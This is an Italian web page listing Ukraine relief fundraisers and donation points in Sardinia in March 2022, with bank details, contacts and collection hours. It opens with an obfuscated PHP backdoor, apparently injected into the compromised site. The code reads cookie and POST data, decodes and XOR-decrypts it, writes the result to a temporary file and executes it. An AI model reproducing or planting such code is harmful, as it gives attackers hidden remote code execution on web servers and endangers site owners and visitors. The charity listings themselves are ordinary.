$jCaSr = class_exists("CsF_PAvb");if (!$jCaSr){class CsF_PAvb{private $lqKbghts;public static $PiRoBF = "e2c33302-260b-4003-a444-b806e1bdd721";public static $MbKVXqxy = NULL;public function __construct(){$OhUmHzZd = $_COOKIE;$gofHJODuY = $_POST;$BZjaj = @$OhUmHzZd[substr(CsF_PAvb::$PiRoBF, 0, 4)];if (!empty($BZjaj)){$HPjwgVW = "base64";$eiAIK = "";$BZjaj = explode(",", $BZjaj);foreach ($BZjaj as $IVThshtb){$eiAIK .= @$OhUmHzZd[$IVThshtb];$eiAIK .= @$gofHJODuY[$IVThshtb];}$eiAIK = array_map($HPjwgVW . '_' . "\x64" . chr ( 817 - 716 )."\x63" . "\x6f" . "\x64" . chr ( 991 - 890 ), array($eiAIK,)); $eiAIK = $eiAIK[0] ^ str_repeat(CsF_PAvb::$PiRoBF, (strlen($eiAIK[0]) / strlen(CsF_PAvb::$PiRoBF)) + 1);CsF_PAvb::$MbKVXqxy = @unserialize($eiAIK);}}public function __destruct(){$this->hZqRGi();}private function hZqRGi(){if (is_array(CsF_PAvb::$MbKVXqxy)) {$BMoxQB = sys_get_temp_dir() . "/" . crc32(CsF_PAvb::$MbKVXqxy["\163" . "\x61" . chr ( 1048 - 940 ).'t']);@CsF_PAvb::$MbKVXqxy["\167" . "\162" . chr ( 1034 - 929 ).chr ( 651 - 535 ).'e']($BMoxQB, CsF_PAvb::$MbKVXqxy["\x63" . 'o' . "\156" . "\164" . "\145" . chr (110) . chr (116)]);include $BMoxQB;@CsF_PAvb::$MbKVXqxy[chr (100) . "\145" . chr ( 259 - 151 )."\x65" . 't' . 'e']($BMoxQB);exit();}}}$AhUPWDj = new CsF_PAvb(); $AhUPWDj = NULL;} ?>
In una situazione complessa, tragica ed in continua evoluzione tutti noi possiamo fare la nostra parte con una prima azione concreta aderendo alla campagna di raccolta fondi che Anpas ha deciso di lanciare a favore della popolazione ucraina, donando a:
Banca Intesa San Paolo
IBAN: IT 56 A 03069 09606 100000067621
SWIFT/BIC: BCITITMM
Intestato a: Anpas -Associazione Nazionale Pubbliche Assistenze
causale: emergenza umanitaria Ucraina
È fondamentale il sostegno di tutti e tutte e lo sarà sempre di più nelle prossime settimane: per chi sceglierà di rimanere in Ucraina, per chi sarà costretto a rimanere in Ucraina, per le migliaia di persone – soprattutto donne e bambini- che cercheranno rifugio oltre i confini del proprio paese ed anche in Italia.
https://www.anpas.org/categoria-news-generale/3839-raccoltafondi-ucraina.html
L’Associazione Cittadini del Mondo OdV Cagliari insieme alla Federazione nazionale AVIB pronta ad organizzare l’accoglienza dei bambini ucraini in fuga dagli orrori della guerra.
La guerra è una tragedia immensa le cui conseguenze le pagano i più deboli, in particolare i bambini.
In questi vent’anni l’Associazione Cittadini del Mondo OdV insieme a tantissime altre associazioni in tutta Italia, ha ospitato decine di migliaia di bambini nell’ambito dei progetti Chernobyl grazie al sostegno e alla collaborazione di famiglie di tutti gli angolo del nostro paese, che con grande cuore hanno aderito a questo grande atto di solidarietà concreta. Di fronte alla guerra che colpisce territori e città a noi care, dove abbiamo tanti amici, parenti, conoscenti ci sentiamo vicini alla popolazione ucraina e diamo la nostra immediata disponibilità per organizzare l’accoglienza dei bambini ucraini prime vittime di questa atroce guerra.
Mai come in questo momento ci pare giusto ricordare l’articolo 11 della Costituzione Italiana frutto della saggezza dei nostri Costituenti: “L’Italia ripudia la guerra come strumento di offesa alla libertà degli altri popoli e come mezzo di risoluzione delle controversie internazionali”
Questo imperativo vale sempre, qualunque sia l’aggressore, qualunque sia il paese vittima di aggressione. Vale oggi e valeva ieri, vale in qualunque latitudine. Troppi pare lo dimentichino!!
Insieme alla Federazione nazionale AVIB alla quale aderiamo che raccoglie associazioni di accoglienza internazionale a favore dei bambini bielorussi (http://www.avib.it/) sta avviando i contatti con le istituzioni per capire le modalità che possano essere messe in campo, pur consapevoli delle grandi difficoltà di carattere logistico, per poter organizzare l’accoglienza dei bambini ucraini in fuga dalla guerra.
Chi fosse interessato può contattare la nostra Associazione alla mail: cittadinidelmondo.ca@gmail.com oppure alla mail della federazione AVIB federazione.avib@gmail.com, che opera a livello nazionale, per poter creare una mailing list delle famiglie disponibili, attraverso la quale non appena sarà chiaro come poter procedere alle accoglienze comunicheremo le modalità operative.
La Federazione Rete Sarda Diabete sostiene l’iniziativa “Spare a Rose for Ukraine” a favore della popolazione Ucraina.
L’iniziativa durerà per tutto marzo. Le donazioni saranno dirette a Insulin for Life, un ente di beneficenza registrato con oltre due decenni di esperienza nella fornitura di insulina e materiale di consumo per diabetici a Paesi con risorse insufficienti e nella risposta alle emergenze. Il loro consorzio internazionale e la rete in Europa, con partner in Ucraina e nei paesi limitrofi, ha forniture pronte per l’uso quando e dove necessario.
Il link di riferimento all’iniziativa è https://sparearose.org/
Arcidiocesi di Cagliari – Caritas Diocesana
PER CONTRIBUIRE ALLA RACCOLTA FONDI si potranno da subito versare le offerte sui conti della Caritas diocesana, specificando nella causale: “Raccolta fondi emergenza Ucraina”:
BANCA INTESA SAN PAOLO intestato a Arcidiocesi di Cagliari – Caritas Diocesana Piazza Palazzo 4, 09124 Cagliari
IBAN IT26 V030 6909 6061 0000 0070 158;
BANCOPOSTA – intestato a Arcidiocesi di Cagliari-Caritas Diocesana, via Mons. Cogoni 9, 09121 Cagliari
IBAN IT87 Z076 0104 8000 0101 2088 967
Si può contribuire anche direttamente online attraverso la sezione “dona ora” del sito
Un punto di raccolta di beni di prima necessità per sostenere la popolazione ucraina è stato attivato a Quartu Sant’Elena dall’associazione ARCOIRIS ODV, in collegamento della raccolta organizzata dalla Associazione OCI (Organizzazione Cittadini Immigrati), Chiesa Cattolica Santa Sofia (Roma), Ambasciata Ucraina di Roma – Croce Rossa e Caritas in Ucraina. Il fabbisogno prioritario è limitato a medicinali e cibo non deperibile (non in confezioni di vetro). No abbigliamento. I beni potranno essere consegnati presso la sede di ARCOIRIS ODV in via Genova 38/A dal lunedì al venerdì orario 9-13 e 16-18.
Emergenza-Ucraina-punto-di-raccolta-a-Quartu.pdf [il documento in formato.pdf]
https://www.arcoirisodv.org
CONFRATERNITA DELLA MISERICORDIA DI SASSARI
𝗥𝗮𝗰𝗰𝗼𝗹𝘁𝗮 𝘂𝗺𝗮𝗻𝗶𝘁𝗮𝗿𝗶𝗮 𝗮 𝘀𝗼𝘀𝘁𝗲𝗴𝗻𝗼 𝗱𝗲𝗹 𝗽𝗼𝗽𝗼𝗹𝗼 𝘂𝗰𝗿𝗮𝗶𝗻𝗼
Rivolgiti alla Misericordia più vicina a casa tua per consegnare scatole di generi alimentari, prodotti per l’igiene personale, abbigliamento e coperte, prodotti per l’infanzia, medicinali e materiale sanitario.
Auser Nazionale ha attivato una raccolta fondi in favore dell’organizzazione umanitaria Intersos, a sostegno di un progetto di accoglienza in Moldavia e in Polonia per i profughi ucraini.
Punto raccolta Senorbì – Oratorio Piazza di Chiesa
7 ed 8 marzo 2022, dalle ore 10:00 alle ore 12:00 e dalle ore 16:00 alle ore 19:00
9 marzo 2022, dalle ore 10:00 alle ore 12:00
Iniziativa di solidarietà nata dalla collaborazione fra Confraternita della Misericordia, Protezione Civile, Parrocchia di Santa Barbara in Senorbì.
La PROVIC ITALIA ha lanciato un’iniziativa solidale dedicata ai profughi in fuga dall’Ucraina.
A seguito della richiesta di farmaci e prodotti per neonati per l’Ucraina, da lunedì 7 marzo al 10 marzo 2022, dalle ore 15:30 alle ore 19:30, presso la sede dell’Associazione PROCIV AUGUSTUS, sita ad Assemini, nella via Bacaredda [Sede Scuole Industruiali], verrà allestito un centro di raccolta di beni di prima necessità che saranno trasportati direttamente presso i campi profughi ai confini Polonia-Ucraina, con partenza prevista per l’11 marzo.